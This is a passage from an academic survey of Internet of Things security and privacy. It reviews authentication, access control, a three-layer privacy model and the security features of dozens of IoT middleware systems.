well-publicised example [90], a security researcher gained access to full controls of a number of “smart homes”. As discussed above, the Mirai attack took control of devices that used default or easily guessed passwords. Similarly many home routers are at risk through insecure authentication [10]. Such vulnerabilities can then spread to other devices on the same network as attackers take control of the local area network. A key issue here is the initial registration of the device. A major issue with hardware is when the same credential, key, or password is stored on many devices. Devices are susceptible to hardware attacks (as discussed above) and the result is that the loss of a single device may compromise many or all devices. In order to prevent this, devices must either be pre-programmed with unique identifiers and credentials at manufacturing time, or must go through a registration process at setup time. In both cases this adds complexity and expense, and may compromise usability. In [71] there is a proposal for the use of the OAuth2 Dynamic Client Registration [155] process to create unique keys/credentials for each device. In [69] there is a well-defined and secure process for device and user registration that allows users to take control of devices in scenarios where the device itself offers no User Interface (UI) or a very basic UI. 2.11 B4: Network Authentication Unlike browsers or laptops where a human has the opportunity to provide authentication information such as a userid and password, IoT devices normally run unattended and need to be able to power-cycle and reboot without human interaction. This means that any identifier for the device needs to be stored in the program memory (usually SRAM), ROM or storage of the device. This brings two distinct challenges: • The device may validly authenticate, but the program code may have been changed, and therefore it may behave incorrectly. • Another device may steal the authentication identifier and may spoof the device. In the Sybil attack [129] a single node or nodes may impersonate a large number of different nodes thereby taking over a whole network of sensors. In all cases, attestation is a key defence against these attacks. Another defence is the use of reputation and reputational models to associate a trust value to devices on the network. Reputation is a general concept widely used in all aspects of knowledge ranging from humanities, arts and social sciences to digital sciences. In computing systems, reputation is considered as a measure of how trustworthy a system is. There are two approaches to trust in computer networks: the first involves a “black and white” approach based on security certificates, policies, etc. For example, SPINS [140], develops a trusted network. The second approach is probabilistic in nature, where trust is based on reputation, which is defined as a probability that an agent is trustworthy. In fact, reputation is 9/34 often seen as one measure by which trust or distrust can be built based on good or bad past experiences and observations (direct trust) [94] or based on collected referral information (indirect trust) [1]. In recent years, the concept of reputation has shown itself to be useful in many areas of research in computer science, particularly in the context of distributed and collaborative systems, where interesting issues of trust and security manifest themselves. Therefore, one encounters several definitions, models and systems of reputation in distributed computing research (e.g. [73, 94, 168]). There is considerable work into reputation and trust for wireless sensor networks, much of which is directly relevant to IoT trust and reputation. The Hermes and E-Hermes [201, 202] systems utilise Bayesian statistical methods to calculate reputation based on how effectively nodes in a mesh network propogate messages including the reputation messages. Similarly, [46] evaluates reputation based on the packet-forwarding trustworthiness of nodes, in this case using fuzzy logic to provide the evaluation framework. Another similar work is [117] which again looks at the packet forwarding reputation of nodes. In IoT, [21] utilizes the concept of a Utility Function to create a reputational model for IoT systems using the MQTT protocol. 2.12 C4: Cloud Authentication The IETF has published a draft guidance on security considerations for IoT [131]. This draft does discuss both the bootstrapping of identity and the issues of privacy-aware identification. One key aspect is that of bootstrapping a secure conversation between the IoT device and other systems, which includes the challenge of setting-up an encrypted and/or authenticated channel such as those using TLS, Host Identity Protocol (HIP) or Diet HIP. HIP [122] is a protocol designed to provide a cryptographically secured endpoint to replace the use of IP addresses, which solves a significant problem – IP-address spoofing – in the Internet. Diet HIP [121] is a lighter-weight rendition of the same model designed specifically for IoT and Machine to Machine (M2M) interactions. While HIP and Diet HIP solve difficult problems, they have significant disadvantages to adoption. Secure device identity models that work at higher levels in the network stack, such as token-based approaches, can sit side by side with existing IP-based protocols and require no changes at lower levels of the stack. By contrast, HIP and Diet HIP require low-level changes within the IP stack to implement. As they replace traditional IP addressing they require many systems to change before a new device using HIP can successfully work. In addition, neither HIP nor Diet HIP address the issues of federated authorization and delegation. In [68] and [70] it is proposed to use federated identity protocols such as OAuth2 [84] with IoT devices, especially around the MQTT protocol [111]. The IOT-OAS [47] work similarly addresses the use of OAuth2 with CoAP. Other related works include the work of Augusto et al. [19] have built a secure mobile digital wallet by using OAuth together with the XMPP protocol [154]. In [71], the usage of OAuth2 for IoT devices is extended to include the use of Dynamic Client Registration [156] which allows each device to have its own unique identity, which we discussed as an important point in the section about Cell A1. A contradictory aspect of IoT Authentication is the proposal to use secure Pseudonyms. A pseudonym is also sometimes referred to as an Anonymous Identity. Effectively, a secure pseudonym is a way of a user securely interacting with a system without giving away their real identity. This overlaps with Cell C5 where we look at access control for cloud systems. We have seen from well-publicised cases that systems may be compromised and offer personal information, even years after that information was originally stored. In one case, two suicides have been attributed to an attack that compromised personal identities [27]. Pseudonyms are an approach that can be considered to treat the sharing of meta-data as important as sharing of data. Also see section 3 where we look at another model of privacy. In [151] a capability-based access system is described that allows anonymous identities to be used. [30] provides an Architecture Reference Model for an approach that supports anonymous identities. Neither of these systems separate the provision of anonymous identities from the data-sharing middleware. A concept called Zooko’s Triangle [132] proposed that it is only possible to support two out of the following three capabilities in a system: human-readable names; decentralised infrastructure; and security. Recent papers, such as [8], claim that the blockchain construct proves Zooko’s hypothesis wrong. In [86] the concept of anonymous identities for blockchains is explored, which will have significant impact as blockchains become more prevalent in IoT. 10/34 2.13 A5: Device Access Control There are two challenges to access control at the device level. Firstly, devices are often physically distributed and so an attacker is likely to be able to gain physical access to the device. The challenges here (hardware attacks, NAND mirroring, etc) were already discussed in Cell A1. However, there is a further challenge: access control almost always requires a concept of identity. We cannot restrict or allow access except in the most basic ways without some form of authentication to the device. As discussed in our review of Cell A4, this is a significant challenge. To give a real life example, certain mobile phones have recently started encrypting data based on the user’s own lock-screen Personal Identification Number (PIN) code [159]. This guarantees the data cannot be read without the user’s PIN code. However, using NAND Mirroring, it has been demonstrated that the controls that stop repeated attempts at PIN codes can be overcome [170], with the result that a 4 digit PIN can easily be broken within a reasonable amount of time. Systems such as Webinos [54] have proposed using policy-based access control mechanisms such as XML Access Control Markup Language (XACML) [79] for IoT devices. However, XACML is relatively heavyweight and expensive to implement [183], especially in the context of low power devices. To address this, Webinos has developed an engine which can calculate the subset of the policy that is relevant to a particular device. Despite this innovation, the storage, transmission and processing costs of XACML are still high for an IoT device. Another approach based around a standard called UMA is covered in Cell C5. 2.14 B5: Network Access Control There are a number of researchers looking at how to create new lightweight protocols for access control in IoT scenarios. [114] describe a new protocol for IoT authentication and access control is proposed based on ECC with a lightweight handshake mechanism to provide an effective approach for IoT, especially in mobility cases. [89] propose a non-centralised approach for access control that uses ECC once again and supports capability tokens in the CoAP protocol. 2.15 C5: Cloud Access Control The biggest challenge for privacy is ensuring access control at the server or cloud environment of data collected from the IoT. There is some significant overlap with the area of confidentiality of data in the cloud as well (Cell C1). It is argued in [70] that existing hierarchical models of access control are not appropriate for the scale and scope of the IoT. There are two main approaches to address this. The first is policy-based security models where roles and groups are replaces by more generic policies that capture real-world requirements such as “A doctor may view a patient’s record if they are treating that patient in the emergency room”. The second approach to support the scale of IoT is user-directed security controls, otherwise known as consent. This is the approach we take in this thesis. In [64] a strong case is made for ensuring that users can control access to their own resources and to the data produced by the IoT that relates to those users. The User Managed Access (UMA) from the Kantara Initiative enhances the OAuth specification to provide a rich environment for users to select their own data sharing preferences [92]. We would argue strongly that this overall concept of user-directed access control to IoT data is one of the most important approaches to ensuring privacy. In [182], an approach for using UMA together with OAuth2 is proposed for constrained devices. This approach also addresses Cell A5. While this approach has a lot of capabilities and power, there is a slow uptake of UMA in real-world services and even less in IoT. We propose that the complexity of this approach is the inhibitor to widespread adoption. [194] argues that contextual approaches must be taken to ensure privacy with the IoT. Many modern security systems use context and reputation to establish trust and to prevent data leaks. Context-based security [119] defines this approach which is now implemented by major Web systems including Google and Facebook. This is closely related to reputation-based models which we discussed above. 2.16 A6: Device Non-repudiation The biggest challenge in the non-repudiation network with IoT devices is the challenge of using attestation for small devices. Attestation is discussed in detail in Cell A2. Without attestation, we cannot trust that the device system has not been modified and therefore it is not possible to trust any non-repudiation data from the device. 11/34 2.17 B6: Network Non-repudiation The same challenges apply here as discussed in cells B2, B3. Non-repudiation on the wire requires cryptography techniques and these are often hindered by resource restrictions on small devices. In [133] a non-repudiation protocol for restricted devices is proposed. 2.18 C6: Cloud Non-repudiation This area is unchanged by the IoT, so we do not discuss it any further. In the previous eighteen sections we have outlined a significant number of threats and challenges, and used this matrix to assess the most relevant current work in each space. Before summarising this work, we look at an orthogonal model more closely focussed on user privacy. This model will be used in later sections to assess the outcomes of this thesis. 3 THREE LAYER PRIVACY MODEL One area that crosses most or all of the cells in our matrix is the need for a holistic and studied approach to enabling privacy in the IoT. As discussed in a number of cells, there are significant challenges to privacy with the increased data and metadata that is being made available by IoT-connected devices. An approach that has been proposed to address this is Privacy by Design [43]. This approach suggests that systems should be designed from the ground up with the concept of privacy built into the heart of each system. Many systems have added security or privacy controls as “add-ons”, with the result that unforeseen attacks can occur. Spiekermann and Cranor [173] offer a model for looking at user privacy. In their model, they identify three spheres: the User Sphere, the Joint Sphere and the Recipient Sphere. The User Sphere is completely in the control of the user (e.g. a laptop). The Joint Sphere refers to areas that may seem to be in the user’s control, but may have some significant control by a third-party. For example, a cloud email account may seem like the user can delete emails, but the cloud provider may in fact back these up and keep a copy. Finally, once data has been transferred to a third-party, it is assumed to be in the Recipient Sphere, where the only controls are legal and contractual. In the model, a device that offers the user full control is firmly in the User Sphere. However, we would argue that many current devices are actually in the Joint Sphere. This is where the device appears to be in the control of the user but in fact is in the control of a third-party. To give an example, the Google Nest device offers users the opportunity to apply smart heating controls to their house. While a number of user-centred controls give the user the impression that it is in the User Sphere, there are two key reasons to counter this: firstly, the data logged by the device is extensive and cannot be controlled by the user; secondly, the device auto-updates itself based on commands from Google rather than based on user input [128]. Using this model, we can propose clear approaches that strengthen each of the privacy and security controls available in each sphere. Figure 1 provides an overview of this model and its applicability to the IoT domain. 3.1 User Sphere Moving privacy and security controls back to the users inherently strengthens the User Sphere and provides greater choice, thereby allowing more secure approaches to flourish. As discussed above, devices need to have secure identities, and currently these are either not provided, or provided by the device manufacturer. A second, related issue, is the ownership of devices. The Mirai botnet spread because dictionary attacks allowed attackers to take ownership of devices. Some systems offer models of taking ownership securely (e.g. Bluetooth, Near Field Communication (NFC)). In [69], there is a system described where a QR code is used in conjunction with a Web-based system. A third issue within the User Sphere is updating the device firmware. A number of attacks have originated in lack of updates. One issue is that device manufacturers are incentivised to create new products but not to update old products. In [180], a model is proposed whereby devices can pay for updates using a blockchain-based cryptocurrency such as Bitcoin. In the [69] there is an approach where IoT devices are updated based on the secure identity and consent models used in OAuth2. 12/34 User Sphere: Device Iden*ty Device Ownership and Registra*on Device Updates Joint Sphere: Consent Management Policies Recipient Sphere: Consent Tracking Policy Enforcement Data Revoca*on Figure 1. Three Layer Privacy model applied to IoT 3.2 Joint Sphere Recall that the Joint Sphere is the parts of the system where the user has some form of control over their data and systems, but the provider also shares control. For example, a health-monitoring device may upload data to an Internet-based system and then may offer users controls on how they share data. A major change in legislation around this is the European Union’s General Data Protection Regulation (GDPR) [186] which requires much stronger consent controls. Many systems offer forms of user consent for sharing data with third parties, but these lack significant requirements. For example, many users are not aware of how to revoke consent. Similarly, there is no clear place a user can identify all the consents they have approved across different devices. Consent is not just about privacy. IoT devices often include actuators that can act based on Commands, and the security of a device includes ensuring that only authorised systems can issue commands to devices. We looked at consent A related area is that of policies. In this meaning a policy is a computer-readable expression of rights and obligations. For example, a consent approval may refer to a policy: the user might approve sharing of data to a website based on the fact that the website promises not to share the data to any other body. Languages such as XACML [79] allow complex access control policies to be encoded in XML or JSON. We discussed this in Cell C5. 3.3 Recipient Sphere The Recipient Sphere is the area where the user’s data is now out of their control. Ultimately, the user must rely on legislation or legal contracts in order to maintain control of this data. Of course, it is hard to police this recipient sphere: it is possible that the third-party website will share data following policies. In addition, many organisations have such complex and poorly worded policies that users are unaware of the rights they are giving up to their data. Spotting illicit data shares can possibly be done using a concept of a Trap Street. This is the habit that map-makers have of including incorrect data to see if others copy it. Similarly, IoT devices could deliberately share incorrect data to specific parties to see if it leaks out against the agreed policy. 13/34 4 SUMMARY OF THE REVIEW OF SECURITY ISSUES In this section we have proposed a widened ontology for evaluating the security issues surrounding the Internet of Things, and examined the existing literature and research in each of the cells of the expanded matrix. We have also related these issues to Spiekermann and Cranor’s Three Layer Privacy Model. This is an important basis for the next section where we examine the provisions around security and privacy that are available in available middleware for the Internet of Things. In reviewing these areas, we identified a list of security properties and capabilities that are important for the security and privacy of IoT. We will use this list in the second part of this paper as columns in a new table where we evaluate a set of middleware on their provision of these capabilities. REQ1 - Integrity and Confidentiality The requirement to provide integrity and confidentiality is an important aspect in any network and as discussed in cells A1-B2 there are a number of challenges in this space for IoT. REQ2 - Access Control Maintaining access control to data that is personal or can be used to extract personal data is a key aspect of privacy. In addition, it is of prime importance with actuators that we do not allow unauthorised access to control aspects of our world. REQ2.1 - Consent As described in cells A5-C5, traditional hierarchical models of access control are ineffective for personal data and IoT systems. Consent approaches – such as OAuth2 and UMA – are a key requirement. REQ2.2 - Policy-based access control As discussed in cells A5-C5, policy-based access control models such as XACML enable privacy considerations and rules to be implemented effectively in IoT scenarios, although in many cases models such as XACML are too heavyweight to deploy into devices. REQ3 - Authentication As discussed in numerous of the cells, IoT systems need a concept of authentication in order to enable integrity, confidentiality, and access control amongst other requirements. REQ3.1 - Federated Identity As argued in cells A4-C4, there is a clear motivation for the use of federated models of identity for authentication in IoT networks. REQ3.2 - Secure Device Identity Managing the security of devices requires unique credentials to be embedded into each device and secure registration processes as discussed in cell A4. REQ3.3 Anonymous Identities In order to guard against de-anonymisation and other leakages of personally identifiable information, anonymous identities/pseudonyms can offer individuals clearer consent as to when they wish to actively share their identity, as discussed in A4. REQ4 - Attestation Attestation is an important technique to prevent tampering with physical devices (as discussed in cells in column A) and hence issues with integrity of data as well as confidentiality in IoT. REQ5 - Summarisation and Filtering The need to prevent de-anonymisation is a clear driver for systems to provide summarisation and filtering technologies such as stream processing. REQ6 - Context-based security and Reputation Many modern security models adapt the security based on a number of factors, including location, time of day, previous history of systems, and other aspects known as context. Another related model is that of the reputation of systems, whereby systems that have unusual or less-than-ideal behaviour can be trusted less using probabilistic models. In both cases there are clear application to IoT privacy as discussed above. 14/34 While we consider PBD an important aspect, we argue that it is a meta-requirement: it effectively covers the need to implement the major security and privacy requirements from the initial design outwards. There are of course many other aspects to IoT security and privacy as we have demonstrated in the matrix table and accompanying description of each cell. However, these specific aspects form an effective set of criteria by which to analyse different systems, as we show below in the next section. 5 SECURE MIDDLEWARE FOR THE INTERNET OF THINGS Middleware has been defined as computer software that has an intermediary function between the various applications of a computer and its operating system [85]. In our case, we are interested in middleware that is specifically designed or adapted to provide capabilities for IoT networks. There are a number of existing surveys of IoT middleware. Bandyopadhyay et al. [25, 24] review a number of middleware systems designed for IoT systems. While they look at security in passing, there is no detailed analysis of the security of each middleware system. [45] calls out the need for security, but no analysis of the approaches or existing capabilities is provided. [17] is a very broad survey paper that addresses IoT middleware loosely. [146] is another wide-ranging survey of IoT middleware that provides a simple analysis of whether the surveyed systems have any support for security or privacy, but does not address detailed requirements. It is clear then, that a detailed evaluation of security in IoT middleware is a useful contribution to the literature. We therefore identified a set of middleware systems to study. 5.1 Middleware Review Methodology This set was identified through a combination of the existing literature reviews on IoT middleware [25, 45, 146] together with our own search for middleware systems that explicitly target IoT scenarios. Some of the systems that were included in these papers we excluded from our list on the basis that they were not middleware. For example, [45] lists TinyREST [113] as a middleware, but in fact we considered this paper to be the definition of a standard protocol and therefore we excluded it. Our search strategy was to use a search for the terms (”IoT” OR ”Internet of Things”) AND ”Mid- dleware”. We searched only in the subject terms and restricted the search to academic papers written in English. The search was carried out by the Portsmouth University Discovery system which is a metasearch engine. The list of databases that are searched is available at [187]. The search was originally issued on June 6th, 2015, identifying 152 papers. It was repeated on December 1st, 2016, and 213 papers were identified, showing a significant growth in IoT middleware papers over the intervening period. We then manually reviewed the abstracts of the 213 papers to identify a list of functioning middleware systems as opposed to papers that describe other aspects of IoT without describing a middleware system. This produced a list of 55 middleware systems. In our study, we looked for the security and privacy requirements listed in section 4. We also identified if the middleware had a clearly defined security model and/or security implementation. Out of the 54 middleware systems identified, we found that 35 had no published discussion or architecture for security, or such a minimal description that we were not able to identify any support for the selected security requirements. We label these as non-secured systems. 5.2 Non-Secured Systems We provide a brief description of each of the non-secure middleware systems: ASIP The Arduino Service Interface Programming model (ASIP) [28] is a middleware for Arduino hardware. ASPIRE ASPIRE Project (Advanced Sensors and lightweight Programmable middleware for Innova- tive Rfid Enterprise applications) [15] is a EU-funded project that created an open, royalty-free middleware for RFID-based applications. Autonomic QoS Management [26] offers a middleware that autonomically manages Quality of Service (QoS) in IoT scenarios. While this does address some aspects related to security (i.e. accuracy and availability), there is no discussion of how security is handled. CASCOM In [139] a semantically-driven configuration model is built on top of existing middleware systems such as GSN [2]. The authors state their intention of addressing privacy in future work. 15/34 CIRUS CIRUS [142] is a cloud-based middleware for ubiquitous analytics of IoT data. Cloud-based Car Parking Middleware In [93] the authors describe an OSGi-based middleware for smart cities enabling IoT-based car parking. Context Aware Gateway [9] provides a reference architecture for using context-awareness in IoT sce- narios. The middleware itself does not address security or privacy and the authors plan to address this in further work. DAMP In [6] there is a middleware – Distributed Applications Management Platform – that can configure systems based on Quality of Service characteristics (QoS). These characteristics can include security, but the system itself does not offer any security model. Dioptase Dioptase [31] is a RESTful stream-processing middleware for IoT. Dioptase does address one useful aspect for privacy: intermediate stream processing of data, summarisation and filtering. However, there is no detailed security architecture and description and the security model is left as an item of future work. EDBO [62] describes the Emergent Distributed Bio-Organization: a biologically-inspired platform for self-organising IoT systems. EDSOA An Event-driven Service-oriented Architecture for the Internet of Things Service Execu- tion [100] describes an approach that utilizes an event-driven SOA. EMMA The Environmental Monitoring and Management Agent (EMMA) is a proposed middleware based on CoAP [59]. It does not offer any security architecture. GSN The GSN framework [3] (Global Sensor Networks) defines a middleware for the Internet of Things that requires little or no programming. The security architecture of the system is not described in any detail: there are diagrams of the container architecture which point to proposed places for access control and integrity checks, but unfortunately there is not sufficient discussion to be able to categorize or evaluate the approach taken. Hi-Speed USB middleware [20] offers a middleware based on USB. Hitch Hiker Hitch Hiker 2.0 [145] is a prototype middleware environment built on Contiki OS. LMTS In [116] a middleware system for asset tracking (Laptop Management and Tracking System) is described. Middleware for Environmental Monitoring and Control [195] defines a middleware for environmen- tal monitoring and control. Middleware for Industrial IoT [185] describes a middleware for Industrial IoT based on OpenDDS, which is a middleware that implements the Data Distributions Services (DDS) protocol. At the time of writing the DDS security model was in development and hence the architecture does not address security. MIFIM Middleware for Future Internet Models (MIFIM) [22] is a Web Service-based architecture that uses Aspect-Orientation to allow for simpler reconfiguration. MOSDEN MOSDEN (Mobile Sensor Data Processing Engine) [138] is an extension of the GSN ap- proach (see above) which is explicitly targeted at opportunistic sensing from restricted devices. M-Hub [177] describes a middleware for Mobile IoT applications built on top of another middleware (Scalable Data Distribution Layer). In [80] this work is enhanced to create a middleware for Ambient Assisted Living. In [188] there is another middleware based on M-Hub. There is no support for security or privacy described. PalCom Palcom [175] is a middleware designed for pervasive computing, including IoT systems. It supports ad-hoc composition of services. There is no discussion of security beyond a statement that traditional security models may be added in future. 16/34 POBICOS Platform for Opportunistic Behaviour in Incompletely Specified, Heterogeneous Object Communities (POBICOS) [184] is a device middleware designed to run on small devices. In [176] there is a description of migrating aspects of the middleware to a proxy to enable support for smaller devices. PROtEUS PROtEUS is a process manager designed to support Cyber-Physical Systems [161]. It describes a middleware for complex self-healing processes. RemoteU¡ [42] offers a middleware for Remote user interfaces. SBIOTCM In A SOA Based IOT Communication Middleware [200] is a middleware based on SOAP and WS. There is no security model described. Service Oriented access for Wireless Sensor Networks [72] provides a service-oriented middleware for IoT and Wireless Sensor Network data. Smart Object Middleware [88] describes a Smart Object middleware based on Java. symbIoTe In [172] a roadmap is laid out for a new EU funded project to allow vertical IoT platforms to interoperate and federate. There is no plan for security presented. Thingsonomy Thingsonomy [87] is an event-based publish-subscribe based approach that applies se- mantic technology and semantic matching to the events published within the system. UBIROAD The UBIROAD middleware [179] is a specialization of the UBIWARE project specifically targeting traffic, road management, transport management and related use-cases. UBISOAP ubiSOAP [40] is a Service-Oriented Architecture (SOA) approach that builds a middleware for Ubiquitous Computing and IoT based on the Web Services (WS) standards and the SOAP protocol. VEoT [7] describes a Virtual Environment of Things which is a middleware for Virtual Reality engage- ment with the Internet of Things. WHEREX WhereX [76] is an event-based middleware for the IoT. 6 SECURED SYSTEMS We identified 19 middleware systems that implement or describe sufficient security architecture that we could evaluate them against the requirements that were identified in section 4. We describe these systems as secured. In addition to the requirements identified above, we also identified whether the systems had explicit support or adaptation for IoT specific protocols: MQTT, CoAP, DDS, Bluetooth or Zigbee. As discussed above, in section 2, these protocols have been specifically designed for low-power devices. We label this requirement REQ7. Table 2 shows the summary of this analysis. For each of the secured middleware system we looked at the core published papers and also examined any further available documentation. Below are the specific details of each middleware system. 6.1 &Cube In [198] they describe a middleware, &Cube, that is designed to offer RESTful APIs as well as MQTT connections to integrate with IoT devices. The system offers a security manager providing encryption, authentication and access control. No further details are available on the techniques used. 6.2 Device Cloud In [148] there is a blueprint for a middleware that applies Cloud Computing concepts to IoT device middleware. A more detailed exposition is given in [97]. The approach supports OAuth2.0 to provide tokens to devices. It also supports encryption and access control. There is no support for summarisation, filtering, or consent-based access control described in the publications. 17/34 R E Q 1 - In te g ri ty a n d C o n fi d e n ti a li ty ! R E Q 2 - A c c e ss C o n tr o l! R E Q 2 .1 - C o n se n t! R E Q 2 .2 - P o li c y - b a se d s e c u ri ty ! R E Q 3 - A u th e n ti c a ti o n ! R E Q 3 .1 - F e d e ra te d Id e n ti ty ! R E Q 3 .2 - S e c u re D e v ic e I d e n ti ty ! R E Q 3 .3 - A n o n y m o u s Id e n ti ti e s! R E Q 4 - A tt e st a ti o n ! R E Q 5 - S u m m a ri sa ti o n a n d F il te ri n g ! R E Q 6 - C o n te x t- b a se d s e c u ri ty / R e p u ta ti o n ! R E Q 7 - Io T -s p e c ifi c P ro to c o l S u p p o rt ! &Cube ! Y! Y! Y! Y! Device Cloud! Y! Y! Y! Y! Y! Y! DREMS! Y! Y! Y! Y! DropLock! Y! Y! Y! Y! Y! FIWARE ! Y! Y! Y! Y! Y! Y! Y! Hydra/Linksmart! Y! Y! Y! Y! Income ! Y! Y! Y! Y! Y! IoT-MP ! Y! Y! NERD ! Y! Y! Y! NOS ! Y! Y! Y! Y! Y! OpenIoT! Y! Y! SensorAct! Y! Y! SIRENA ! Y! Y! SMEPP ! Y! Y! Y! SOCRADES! Y! Y! Y! UBIWARE ! Y! WEBINOS ! Y! Y! Y! Y! Y! Y! XMPP ! Y! Y! Y! Y! VIRTUS ! Y! Y! Y! Y! Table 2. Summary of reviewed middleware systems and major properties 6.3 DREMS Distributed RealTime Managed Systems (DREMS) [105] is a combination of software tooling and a middleware runtime for IoT. It includes Linux Operating System extensions as well. DREMS is based on an actor [5] model has a well-defined security model that extends to the operating system. The security model includes the concept of multi-level security (MLS) for communications between a device and the actor. The MLS model is based on labelled communications. This ensures that data can only flow to systems that have a higher clearance than the data being transmitted. This is a very powerful security model for government and military use-cases. However, this approach does not address needs-based access control. For example, someone with Top Secret clearance may read data that is categorised as Secret even if they have no business reason to utilise that data. The weaknesses of this model have been shown with situations such as the Snowden revelations. 6.4 DropLock In [103] the authors describe a middleware specifically built for IoT systems and Smart Cities. The DropLock system is designed to enable secure smartphone access to a smart locker, allowing delivery personnel secure access to drop off packages. The system uses secure tokens to allow access to devices. The tokens are passed to the secure locker using Bluetooth. 6.5 FIWARE FIWARE [78] is a middleware designed to be the basis of a Future Internet, sponsored by the European Union under the FP7 programme. FIWARE is one of the few systems that claim to have used PBD as a basis for design [189]. FIWARE has a concept of plugins, known as Generic Enablers (GE). The security model is implemented through GEs including the Identity Management (IdM GE), the Authorization Policy Decision Point (PDP) GE, and the Policy Enforcement Point (PEP) Proxy. The standard approach within FIWARE is based on OAuth2 and XACML. It also supports interoperable standards for exchanging identities with other systems. The overall security design of FIWARE fits into modern authentication and authorization models. IoT devices are catered for in the FIWARE Architecture through a gateway model. The IoT devices connect to the gateway using IoT specific protocols. The gateway is part of the IoT Edge. This communicates via the standard FIWARE protocols into an IoT Backend where there 18/34 are components supporting Device Management and Discovery. The FIWARE documentation does not describe any specific adaptation of security or support for security between devices and the gateway. 6.6 Hydra / Linksmart Hydra [61] was a European Union funded project which has since been extended and renamed as LinkSmart. The Hydra team published a detailed theoretical model of a policy-based security approach [4]. This model is based on using lattices to define the flow of information through a system. This model provides a language-based approach to security modelling. However, whilst this paper is published as part of the Hydra funded project, there is no clear implementation of this in the context of IoT or description of how this work can benefit the IoT world. Hoever, because Hydra / Linksmart is an Open Source project [109] with documentation beyond the scientific papers, it is possible to understand the security model in greater detail by review of this project. The Hydra and LinkSmart architectures are both based on the Web Services (WS) specifications, building on the SOAP protocol [82], which in turn builds on the XML Language [37]. The security model is described in some detail in the LinkSmart documentation [108]. The model utilises XML Security [58]. There are significant challenges in using this model in the IoT world, as discussed above in section 2. The Hydra/Linksmart approach also uses symmetric keys for security which is a challenge for IoT because each key must be uniquely created, distributed and updated upon expiry into each device creating a major key management issue. Hydra / Linksmart offers a service called the TrustManager. This is a system that uses the cryptographic capabilities to support a trusted identity for IoT devices. This works with a Public Key Infrastructure (PKI) and certificates to ensure trust. Once again there are challenges in the distribution and management of the certificates to the devices which are not addressed in this middleware. The Hydra middleware does not offer any policy based access control for IoT data, and does not address the secure storage of data for users, nor offer any user-controlled models of access control to user’s data. In [135] there is a specific instantiation of LinkSmart applied to energy efficiency in buildings. There is no further extension to the security model. 6.7 INCOME INCOME [11] is a framework for multi-scale context management for the IoT, funded by the French National Research Agency. The aim of INCOME is to fuse together context data from multiple levels to provide a high-level set of context data from IoT systems that can be applied to decision making, including trust, privacy and security decisions. MuDebs and MuContext [107] are frameworks built on top of INCOME that add Attribute Based Access Control (ABAC) and Quality of Context (QoC) processing. MuDebs utilises XACML policies to implement ABAC. MuContext validates QoC and enables privacy filtering. 6.8 IoT-MP The IoT Management Platform (IoT-MP) is a middleware system described in [63]. IoT-MP offers a security module that implements attribute-based access control (ABAC) against systems. IoT-MP has a model whereby an Agent is registered for each class of Things, creating the concept of a Managed Thing. Agents have unique secure identities. The IoT-MP does not define how devices are identified to agents. 6.9 NAPS The Naming, Addressing and Profile Server (NAPS) [110] describes a heterogeneous middleware for IoT based on unifying data streams from multiple IoT approaches. Based on RESTful APIs, the NAPS approach includes a key component handling Authentication, Authorization, and Accounting (AAA). The design is based on the Network Security Capability model defined in the ETSI M2M architecture [65]. However, the main details of the security architecture have not yet been implemented and have been left for future work. There is no consideration of federated identity or policy based access control. 6.10 NERD No Effort Rapid Development (NERD) [50] is a middleware designed for human IoT interfaces, especially around Bluetooth LE systems and iBeacon discovery. It does not add any new security measures but uses the existing security models in Bluetooth and HTTP. 19/34 6.11 NOS NetwOrked Smart objects (NOS) [166, 167] takes an interesting approach to security where the aim is to provide each item of data with a reputational score based on a quality analyser and a security analyser. A machine learning algorithm is used to learn the behaviour of systems in the network and adjust the scores based on the potential attacks and the applied countermeasures. The system incorporates keys and key-based authentication, encryption and complex passwords. 6.12 OpenIoT OpenIoT is an open cloud-based middleware for the Internet of Things, funded by the European Union FP7 programme. It also extends the GSN framework. The Security Module uses OAuth2 as the main authentication and authorization model for web-based systems. No details are given of how sensors are authenticated or authorized. 6.13 SensorAct SensorAct [13] is an IoT middleware specifically aimed at providing support for Building Management Systems (BMS). It supports fine-grained access control through the use of a rules engine to implement access control policies. No details are provided of the authentication models at the device level or the web interface. 6.14 SIRENA SIRENA (Service Infrastructure for Real-time Embedded Networked Devices) [34] is a SOAP/WS-based middleware for IoT and embedded devices. While there is little description of the security framework in SIRENA, it does show the use of the WS-Security specification. As previously discussed, this approach is very heavyweight, has issues with key distribution, federated identity and access control. 6.15 SMEPP Secure Middleware for P2P (SMEPP) [29] is an IoT middleware explicitly designed to be secure, especially dealing with challenges in the peer-to-peer model. SMEPP security is based around the concept of a group. When a peer attempts to join a group, the system relies on challenge-response security to implement mutual authentication. At this point the newly joined peer is issues a shared session key which is shared by all members of the group. SMEPP utilizes elliptic key cryptography to reduce the burden of the security encryption onto smaller devices. Overall SMEPP has addressed security effectively for peer-to-peer groups, but assumes a wider PKI infrastructure for managing the key model used within each group. In addition, there is no discussion of access control or federated identity models, which are important for IoT scenarios. The model is that any member of the group can read data published to the group using the shared session key. 6.16 SOCRADES SOCRADES [52] is a middleware specifically designed for manufacturing shop floors and other industrial environments. Based on SOAP and the WS stack it utilizes the security models of the WS stack, in particular the WS-Security standard for encryption and message integrity. There is no special support for federation, tokens or policy-based access control (instead relying on role-based access control). The resulting XML approach is very heavyweight for IoT devices and costly in terms of network and power [60]. In addition, the lack of explicit support for tokens and federated security and identity models creates a significant challenge in key distributions and centralized identity for this approach. 6.17 UBIWARE The UBIWARE project is a smart semantic middleware for Ubiquitous Computing [160]. The security model for UBIWARE is not clearly described in the original paper, but an additional paper describes a model called Smart Ubiquitous Resource Privacy and Security (SURPAS) [127], which provides a security model for UBIWARE. UBIWARE is designed to utilize the semantic Web constructs, and SURPAS utilises the same model of semantic Web as the basis for the abstract and concrete security architectures that it proposes. The model is highly driven by policies and these can be stored and managed by external parties. In particular the SURPAS architecture is highly dynamic, allowing devices to take on board new roles or functions at runtime. While the SURPAS model describes a theoretical solution to the approach, there are few details on the concrete instantiation. For example, while the model defines a policy-based approach 20/34 to access control, there are no clearly defined policy languages chosen. There is no clear model of identity or federation, and there is no clear guidance on how to ensure that federated policies that are stored on external servers are protected and maintain integrity. The model does not address any edge computing approaches or filtering/summarisation of IoT data. However, the overall approach of using ontologies and basing policies on those ontologies is very powerful. 6.18 WEBINOS The Webinos [54] system has a well-thought through security architecture. The documentation explicitly discussed PBD. The Webinos system is based around the core concept of devices being in the personal control of users and therefore having each user having a “personal zone” to protect. This is a more advanced concept but in the same vein as the protected sub-domains in VIRTUS. In the Webinos model, each user has a cloud instance - known as the Personal Zone Hub (PZH) that supports their devices. The Personal 